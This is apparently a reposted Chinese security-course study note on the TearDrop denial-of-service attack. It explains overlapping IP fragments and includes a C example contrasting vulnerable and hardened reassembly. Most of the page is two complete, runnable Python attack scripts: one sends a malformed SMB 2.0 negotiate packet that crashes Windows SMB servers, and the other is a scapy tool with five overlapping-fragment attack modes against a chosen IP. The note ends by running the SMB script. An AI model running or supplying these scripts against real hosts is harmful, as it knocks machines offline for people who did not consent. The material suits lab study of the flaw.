[安全牛 study notes] TearDrop
Source: Internet  Editor: 程序博客网  Date: 2024/06/05 12:01
TearDrop
Mainly targets early Microsoft operating systems (Windows 3.x, 95, 98, NT)
- In recent years it was found to also work against Android 2.x and iOS 6.0
The principle is interesting
- The IP fragment offset field is used to make fragments overlap: the second fragment is placed inside the first one and ends before the first one does. A reassembler that trims the overlapping prefix and then computes the remaining length as "end minus offset" gets a negative number, which the copy routine treats as a huge unsigned size and overruns kernel memory, so one crafted pair of fragments is a denial of service.
Attack effect
- The victim blue-screens, reboots or hangs
                    { <- PAYLOAD, max 1480 bytes (all of it counts toward the fragment offset) -> }
┌─────────┬────────┬─────────────┬──────────────────────────────────┬─────┐
│ MAC hdr │ IP hdr │ upper-layer │ DATA DATA ...                    │ FCS │
│  (14)   │  (20)  │   header    │                                  │ (4) │
└─────────┴────────┴─────────────┴──────────────────────────────────┴─────┘
          { <- Total Length, max 1500 bytes -> }
{ <- Ethernet frame, max 1518 bytes -> }
The fragment offset is measured from the start of the IP payload, so the upper-layer (ICMP/UDP) header is part of the data that gets fragmented and only the first fragment carries it.
C:\User\yuanfh>ping -l 4000 192.168.1.1
OmniPeek -> filter on ICMP
TearDrop
Send a large ping and compare normal fragmentation with teardrop attack traffic in the capture.
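The reassembly bug described above, worked through in C. This is an added example, not code from the 安全牛 course or from the scripts on this page: copy_len_vulnerable() reproduces the classic reassembler arithmetic (trim the overlap, then length = end - offset), copy_len_hardened() adds the check that a fragment lying entirely inside data already received is dropped, and reassemble_hardened() runs that check over two constructed fragment lists: the three fragments a `ping -l 4000` produces (4000 data bytes + 8-byte ICMP header = 4008 bytes, cut at 1480), and the two-fragment teardrop of the script's attack 0 (36-byte first fragment, 4-byte second at offset 3*8 = 24). Fragment contents are stand-ins; the reassembler assumes in-order arrival and does no hole tracking.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DATAGRAM 65535u

/* One incoming fragment: offset and length in bytes (offset already
   multiplied out from the 8-byte units on the wire) and the MF flag. */
struct frag { unsigned offset; unsigned len; int more; };

/* VULNERABLE: the arithmetic of the classic reassembler. After skipping
   the prefix that overlaps the previous fragment, the remaining length
   is end - offset. When the new fragment ends *before* the previous one
   did, that is negative, and the copy routine sees a huge size_t. */
size_t copy_len_vulnerable(unsigned prev_end, unsigned offset, unsigned len)
{
    unsigned end = offset + len;
    if (offset < prev_end) {
        unsigned i = prev_end - offset;   /* overlapping prefix to skip */
        offset += i;
    }
    int n = (int)end - (int)offset;       /* -8 for the page's attack 0 */
    return (size_t)n;                     /* becomes memcpy(dst, src, 0xff...f8) */
}

/* HARDENED: same trimming, but a fragment that lies entirely inside data
   already received carries nothing new and is dropped, as is anything
   that would run past the maximum datagram size. Returns -1 to drop. */
long copy_len_hardened(unsigned prev_end, unsigned offset, unsigned len)
{
    unsigned end = offset + len;
    if (len == 0 || end > MAX_DATAGRAM) return -1;
    if (offset < prev_end) {
        if (end <= prev_end) return -1;   /* teardrop: fully contained */
        offset = prev_end;                /* keep only the new tail */
    }
    return (long)(end - offset);
}

/* Reassemble an in-order fragment list into out[] (MAX_DATAGRAM bytes)
   with the hardened check. Returns the datagram length, or -1 if a
   fragment had to be dropped or the last fragment never arrived. */
long reassemble_hardened(const struct frag *frags, size_t n, uint8_t *out)
{
    unsigned prev_end = 0;
    for (size_t k = 0; k < n; k++) {
        long len = copy_len_hardened(prev_end, frags[k].offset, frags[k].len);
        if (len < 0) return -1;
        unsigned end = frags[k].offset + frags[k].len;
        unsigned start = end - (unsigned)len;       /* after trimming */
        memset(out + start, 'A', (size_t)len);      /* stands in for the fragment bytes */
        prev_end = end;
        if (!frags[k].more) return (long)prev_end;
    }
    return -1;
}

int main(void)
{
    static uint8_t dgram[MAX_DATAGRAM];

    /* Normal traffic (constructed): ping -l 4000 -> 4008 bytes in 1480-byte pieces. */
    const struct frag ping[] = { {0, 1480, 1}, {1480, 1480, 1}, {2960, 1048, 0} };
    printf("ping fragments reassemble to %ld bytes\n",
           reassemble_hardened(ping, 3, dgram));

    /* Teardrop (constructed, attack 0 of the page's script): 36 bytes, then
       4 bytes at offset 24 that end at 28 < 36. */
    const struct frag tear[] = { {0, 36, 1}, {24, 4, 0} };
    printf("vulnerable copy length: %zu bytes\n", copy_len_vulnerable(36, 24, 4));
    printf("hardened reassembly result: %ld\n", reassemble_hardened(tear, 2, dgram));
    return 0;
}
```

Compile with `cc -std=c99 teardrop_reasm.c` (file name is mine). The hardened check still accepts partially overlapping fragments and keeps the new tail, which is what the RFC 791 algorithm allows; modern stacks go further, and since Linux 4.19 any overlapping IPv4 fragment discards the whole datagram.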
Attack on the SMB protocol of Windows systems
- teardrop_smb.py
- Despite the file name, this is not an IP fragment-overlap attack: the script sends a single malformed SMB negotiate request (a non-zero "Process ID High" header field) that crashes the SMB 2.0 server (this is the Vista/Server 2008-era srv2.sys negotiate bug, CVE-2009-3103), so the targets are SMB 2.0 hosts rather than the Windows 95/98 systems of the classic teardrop.
Attack on Android and iOS systems
- teardrop_android_ios.py
The attack vector is not fixed; it has to be derived from analysis of the specific protocol.
root@K:~# cp /media/sf_D_DRIVE/teardrop_* .
root@K:~# ls
Desktop    Downloads           hs_err_pid2077.log  Pictures  teardrop_android_ios.py  Templates
Documents  hs_err_pid1982.log  Music               Public    teardrop_smb.py          Videos
root@K:~# rm *.log
root@K:~# ls
Desktop    Downloads  Pictures  teardrop_android_ios.py  Templates
Documents  Music      Public    teardrop_smb.py          Videos
----------------------------------------------------------------------
root@K:~# geany teardrop_smb.py
#!/usr/bin/env python3
# When the SMB 2.0 negotiate handler receives a "&" (0x26) in the
# "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA bugcheck.
import sys
from socket import socket

# Target: first command-line argument, or the lab host; SMB port 445.
host = (sys.argv[1] if len(sys.argv) > 1 else "192.168.20.17", 445)

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, length 0x90 = 144 bytes
    b"\xff\x53\x4d\x42"  # Server Component: SMB ("\xffSMB")
    b"\x72\x00\x00\x00"  # Command: Negotiate Protocol (0x72) + first 3 bytes of NT status
    b"\x00\x18\x53\xc8"  # last NT status byte, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: 0x2600 --> :) normal value should be "\x00\x00"
    # signature (8), reserved (2), TID 0xffff, PID low
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    # UID, MID, WordCount 0, ByteCount 0x6d (109), then the dialect list:
    # "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgrorps 3.1a",
    # "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x72\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()
----------------------------------------------------------------------
root@K:~# geany teardrop_android_ios.py
#!/usr/bin/env python3
# Teardrop-style overlapping IP fragments built with scapy.
# Every attack sends a first fragment with MF set at offset 0 and then
# one (or, for attack 2, a train of) fragments whose offset lands inside
# data already sent; the 4-byte second fragment of the two-packet attacks
# ends before the first fragment does.
import sys
from scapy.all import IP, Raw, send

USAGE = """Performs teardrop attack from Kali Linux

Usage: ./teardrop_android_ios.py TARGET-IP ATTACK-CODE
  Attack codes:
    0: small payload (36 bytes),    2 packets, offset=3x8 bytes
    1: large payload (1300 bytes),  2 packets, offset=80x8 bytes
    2: large payload (1300 bytes), 12 packets, offset step 80x8 bytes
    3: large payload (1336 bytes),  2 packets, offset=3x8 bytes
    4: large payload (1300 bytes),  2 packets, offset=10x8 bytes
"""

# Two-packet attacks: (first-fragment payload size in bytes,
#                      second-fragment offset in 8-byte units)
TWO_PACKET = {
    "0": (36, 3),
    "1": (1300, 80),
    "3": (1336, 3),
    "4": (1300, 10),
}


def two_fragments(target, size, offset):
    """First fragment: MF set, offset 0, `size` bytes of payload.
    Second fragment: MF clear, starts at offset*8 bytes, only 4 bytes,
    so it is entirely inside the first one (the teardrop condition)."""
    first = IP(dst=target, proto=17, flags="MF", frag=0) / Raw(b"A" * size)
    second = IP(dst=target, proto=17, flags=0, frag=offset) / Raw(b"\x00" * 4)
    return [first, second]


def fragment_train(target, size=1300, step=80, count=12):
    """Attack 2: `count` fragments of `size` bytes each, offsets step*8
    (= 640) bytes apart, so every fragment overlaps the previous one by
    660 bytes; only the last fragment has MF clear."""
    pkts = []
    for n in range(count):
        flags = "MF" if n < count - 1 else 0
        pkts.append(IP(dst=target, proto=17, flags=flags, frag=n * step) / Raw(b"A" * size))
    return pkts


def main(argv):
    if len(argv) != 3:
        print(USAGE)
        sys.exit(1)
    target, attack = argv[1], argv[2]
    print("Attacking target " + target + " with attack " + attack)
    if attack == "2":
        pkts = fragment_train(target)
    elif attack in TWO_PACKET:
        pkts = two_fragments(target, *TWO_PACKET[attack])
    else:
        print(USAGE)
        sys.exit(1)
    print("Using attack " + attack)
    send(pkts)  # needs root (raw sockets)
    print("Done!")


if __name__ == "__main__":
    main(sys.argv)
----------------------------------------------------------------------
root@K:~# ./teardrop_smb.py